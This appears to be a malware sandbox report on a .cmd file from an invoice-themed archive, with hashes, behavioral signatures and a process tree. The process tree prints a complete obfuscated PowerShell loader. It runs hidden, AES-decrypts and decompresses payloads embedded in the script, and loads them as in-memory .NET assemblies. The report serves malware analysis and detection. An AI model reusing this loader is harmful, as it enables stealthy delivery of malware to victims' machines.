Overview
overview
10Static
static
1b3c5e464e4...e3.zip
windows7-x64
1b3c5e464e4...e3.zip
windows10-2004-x64
1INVOICE#BU...03.vhd
windows7-x64
3INVOICE#BU...03.vhd
windows10-2004-x64
3$RECYCLE.B...2Y.lnk
windows7-x64
3$RECYCLE.B...2Y.lnk
windows10-2004-x64
3$RECYCLE.B...CZ.url
windows7-x64
1$RECYCLE.B...CZ.url
windows10-2004-x64
1$RECYCLE.B...JO.url
windows7-x64
1$RECYCLE.B...JO.url
windows10-2004-x64
1$RECYCLE.B...G6.lnk
windows7-x64
3$RECYCLE.B...G6.lnk
windows10-2004-x64
3$RECYCLE.B...O0.cmd
windows7-x64
1$RECYCLE.B...O0.cmd
windows10-2004-x64
1$RECYCLE.B...21.txt
windows7-x64
1$RECYCLE.B...21.txt
windows10-2004-x64
1$RECYCLE.B...65.vhd
windows7-x64
3$RECYCLE.B...65.vhd
windows10-2004-x64
3$RECYCLE.B...2Y.lnk
windows7-x64
3$RECYCLE.B...2Y.lnk
windows10-2004-x64
3$RECYCLE.B...CZ.url
windows7-x64
1$RECYCLE.B...CZ.url
windows10-2004-x64
1$RECYCLE.B...JO.url
windows7-x64
1$RECYCLE.B...JO.url
windows10-2004-x64
1$RECYCLE.B...G6.lnk
windows7-x64
3$RECYCLE.B...G6.lnk
windows10-2004-x64
6$RECYCLE.B...O0.cmd
windows7-x64
1$RECYCLE.B...O0.cmd
windows10-2004-x64
10$RECYCLE.B...65.vhd
windows7-x64
3$RECYCLE.B...65.vhd
windows10-2004-x64
3$RECYCLE.B...op.ini
windows7-x64
1$RECYCLE.B...op.ini
windows10-2004-x64
1Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
25-03-2024 14:35
Static task
static1
Behavioral task
behavioral1
Sample
b3c5e464e43d7db2432f3e28de75bd0eee8fa7a2b7b6fef7134e7115d6681be3.zip
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b3c5e464e43d7db2432f3e28de75bd0eee8fa7a2b7b6fef7134e7115d6681be3.zip
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
INVOICE#BUSAPOMKDS03.vhd
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
INVOICE#BUSAPOMKDS03.vhd
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
$RECYCLE.BIN/$I47GN2Y.lnk
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$RECYCLE.BIN/$I47GN2Y.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
$RECYCLE.BIN/$I6AKHCZ.url
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
$RECYCLE.BIN/$I6AKHCZ.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
$RECYCLE.BIN/$I9BVFJO.url
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
$RECYCLE.BIN/$I9BVFJO.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
$RECYCLE.BIN/$IAEXCG6.lnk
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
$RECYCLE.BIN/$IAEXCG6.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
$RECYCLE.BIN/$IAH62O0.cmd
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
$RECYCLE.BIN/$IAH62O0.cmd
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
$RECYCLE.BIN/$IFTQZ21.txt
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
$RECYCLE.BIN/$IFTQZ21.txt
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
$RECYCLE.BIN/$ITQTF65.vhd
Resource
win7-20240215-en
Behavioral task
behavioral18
Sample
$RECYCLE.BIN/$ITQTF65.vhd
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
$RECYCLE.BIN/$R47GN2Y.lnk
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
$RECYCLE.BIN/$R47GN2Y.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral21
Sample
$RECYCLE.BIN/$R6AKHCZ.url
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
$RECYCLE.BIN/$R6AKHCZ.url
Resource
win10v2004-20240319-en
Behavioral task
behavioral23
Sample
$RECYCLE.BIN/$R9BVFJO.url
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
$RECYCLE.BIN/$R9BVFJO.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral25
Sample
$RECYCLE.BIN/$RAEXCG6.lnk
Resource
win7-20240221-en
Behavioral task
behavioral26
Sample
$RECYCLE.BIN/$RAEXCG6.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
$RECYCLE.BIN/$RAH62O0.cmd
Resource
win7-20240221-en
Behavioral task
behavioral28
Sample
$RECYCLE.BIN/$RAH62O0.cmd
Resource
win10v2004-20240226-en
Behavioral task
behavioral29
Sample
$RECYCLE.BIN/$RTQTF65.vhd
Resource
win7-20240215-en
Behavioral task
behavioral30
Sample
$RECYCLE.BIN/$RTQTF65.vhd
Resource
win10v2004-20240226-en
Behavioral task
behavioral31
Sample
$RECYCLE.BIN/desktop.ini
Resource
win7-20240221-en
Behavioral task
behavioral32
Sample
$RECYCLE.BIN/desktop.ini
Resource
win10v2004-20240226-en
General
-
Target
$RECYCLE.BIN/$RAH62O0.cmd
-
Size
111KB
-
MD5
2c3351c659a42a82e3a3d865c88eaaaf
-
SHA1
7c73b2c98e449be1c5a85806c08cfe05c0a699ab
-
SHA256
f8f8f56ff4b52a36a6619ca8eadab3df1ae333dfda870a36b024bd74cf0ce9e4
-
SHA512
b1962ca896f6328289a61522c6ede86bd0e6436d3dd6ca2170888ee2592a9cf88640f801dd864dbab1713ddb930b4dbed3cba0c5362f56f19150fcdabab599c6
-
SSDEEP
3072:hXiSJ9Nvg6aGNGIR9Lb5ZQ6gvr+sBKWTP8ydL:hnXy2wg9f5ZezrKWTPdV
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1184 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2612 wrote to memory of 2340 2612 cmd.exe cmd.exe PID 2612 wrote to memory of 2340 2612 cmd.exe cmd.exe PID 2612 wrote to memory of 2340 2612 cmd.exe cmd.exe PID 2612 wrote to memory of 1960 2612 cmd.exe cmd.exe PID 2612 wrote to memory of 1960 2612 cmd.exe cmd.exe PID 2612 wrote to memory of 1960 2612 cmd.exe cmd.exe PID 1960 wrote to memory of 2332 1960 cmd.exe cmd.exe PID 1960 wrote to memory of 2332 1960 cmd.exe cmd.exe PID 1960 wrote to memory of 2332 1960 cmd.exe cmd.exe PID 1960 wrote to memory of 1688 1960 cmd.exe cmd.exe PID 1960 wrote to memory of 1688 1960 cmd.exe cmd.exe PID 1960 wrote to memory of 1688 1960 cmd.exe cmd.exe PID 1960 wrote to memory of 1184 1960 cmd.exe powershell.exe PID 1960 wrote to memory of 1184 1960 cmd.exe powershell.exe PID 1960 wrote to memory of 1184 1960 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd';$vPfm='FrBUtpomBUtpBaBUtpseBUtp6BUtp4SBUtptBUtpriBUtpnBUtpgBUtp'.Replace('BUtp', ''),'SplJBtgiJBtgtJBtg'.Replace('JBtg', ''),'GethEjOChEjOuhEjOrrhEjOenhEjOtPhEjOrhEjOochEjOehEjOsshEjO'.Replace('hEjO', ''),'RbMNueabMNudLibMNunbMNuebMNusbMNu'.Replace('bMNu', ''),'TrVMsDanVMsDsfVMsDoVMsDrVMsDmVMsDFiVMsDnalVMsDBlVMsDoVMsDckVMsD'.Replace('VMsD', ''),'CwuCwrewuCwatwuCwewuCwDecwuCwrypwuCwtowuCwrwuCw'.Replace('wuCw', ''),'MaiTiHmnMoTiHmdTiHmuleTiHm'.Replace('TiHm', ''),'EnUWistrUWisyPUWisoinUWistUWis'.Replace('UWis', ''),'LookWIadokWI'.Replace('okWI', ''),'COhAHhOhAHanOhAHgeOhAHExOhAHteOhAHnsOhAHionOhAH'.Replace('OhAH', ''),'DeczWTeomzWTepzWTerzWTeezWTesszWTe'.Replace('zWTe', ''),'CokibSpkibSyTkibSokibS'.Replace('kibS', ''),'InwjkRvwjkRowjkRkewjkR'.Replace('wjkR', ''),'ElONUdeONUdmeONUdntONUdAtONUd'.Replace('ONUd', '');powershell -w hidden;function eQHuL($xDKNl){$wfVuI=[System.Security.Cryptography.Aes]::Create();$wfVuI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wfVuI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wfVuI.Key=[System.Convert]::($vPfm[0])('smeuwWzR6dWlk5l0XRDHt/STkUE6r93X9fZoZ+Y3e4g=');$wfVuI.IV=[System.Convert]::($vPfm[0])('u1EcqhG41JNBknlWNKXGVQ==');$oHOle=$wfVuI.($vPfm[5])();$HZbjq=$oHOle.($vPfm[4])($xDKNl,0,$xDKNl.Length);$oHOle.Dispose();$wfVuI.Dispose();$HZbjq;}function Jvwqe($xDKNl){$rttxe=New-Object System.IO.MemoryStream(,$xDKNl);$KtnaD=New-Object System.IO.MemoryStream;$fHrHd=New-Object System.IO.Compression.GZipStream($rttxe,[IO.Compression.CompressionMode]::($vPfm[10]));$fHrHd.($vPfm[11])($KtnaD);$fHrHd.Dispose();$rttxe.Dispose();$KtnaD.Dispose();$KtnaD.ToArray();}$AGaOg=[System.IO.File]::($vPfm[3])([Console]::Title);$bRtGG=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 5).Substring(2))));$HvxJi=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 6).Substring(2))));[System.Reflection.Assembly]::($vPfm[8])([byte[]]$HvxJi).($vPfm[7]).($vPfm[12])($null,$null);[System.Reflection.Assembly]::($vPfm[8])([byte[]]$bRtGG).($vPfm[7]).($vPfm[12])($null,$null); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1184-4-0x000000001B6A0000-0x000000001B982000-memory.dmpFilesize
2.9MB
-
memory/1184-5-0x0000000002790000-0x0000000002798000-memory.dmpFilesize
32KB
-
memory/1184-6-0x000007FEF5D90000-0x000007FEF672D000-memory.dmpFilesize
9.6MB
-
memory/1184-7-0x00000000027A0000-0x0000000002820000-memory.dmpFilesize
512KB
-
memory/1184-11-0x00000000027A0000-0x0000000002820000-memory.dmpFilesize
512KB
-
memory/1184-10-0x00000000027A0000-0x0000000002820000-memory.dmpFilesize
512KB
-
memory/1184-9-0x00000000027A0000-0x0000000002820000-memory.dmpFilesize
512KB
-
memory/1184-8-0x000007FEF5D90000-0x000007FEF672D000-memory.dmpFilesize
9.6MB
-
memory/1184-12-0x000007FEF5D90000-0x000007FEF672D000-memory.dmpFilesize
9.6MB
-
memory/1184-13-0x00000000027A0000-0x0000000002820000-memory.dmpFilesize
512KB
-
memory/1184-14-0x00000000027A0000-0x0000000002820000-memory.dmpFilesize
512KB